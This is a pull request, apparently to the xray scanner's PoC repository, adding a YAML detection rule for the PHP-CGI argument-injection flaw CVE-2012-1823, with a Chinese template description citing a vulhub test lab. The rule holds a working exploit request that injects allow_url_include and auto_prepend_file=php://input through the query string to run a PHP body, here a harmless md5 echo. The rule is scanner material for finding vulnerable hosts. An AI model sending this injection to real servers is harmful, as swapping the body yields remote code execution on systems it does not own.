### PR TITLE
poc-yaml-php-cgi-cve-2012-1823

### DIFF
--- a/pocs/php-cgi-cve-2012-1823.yml
+++ b/pocs/php-cgi-cve-2012-1823.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-php-cgi-cve-2012-1823
+rules:
+  - method: POST
+    path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
+    body: <?php echo md5("123456"); ?>
+    follow_redirects: false
+    expression: |
+      body.bcontains(b'e10adc3949ba59abbe56e057f20f883e')
+detail:
+  author: 17bdw
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823


### PR DESCRIPTION
poc-yaml-php-cgi-cve-2012-1823

请先本在 repo 中搜索相关信息，确保该 poc 没有被提交过。建议一个PR只提交一个POC，否则审核会有很多麻烦，互相影响导致时间较长。

然后阅读 https://chaitin.github.io/xray/#/guide/contribute

如果你的 poc 符合以上要求，请填写下列信息

## 本 poc 是干什么的

poc-yaml-php-cgi-cve-2012-1823

## 测试环境

https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823

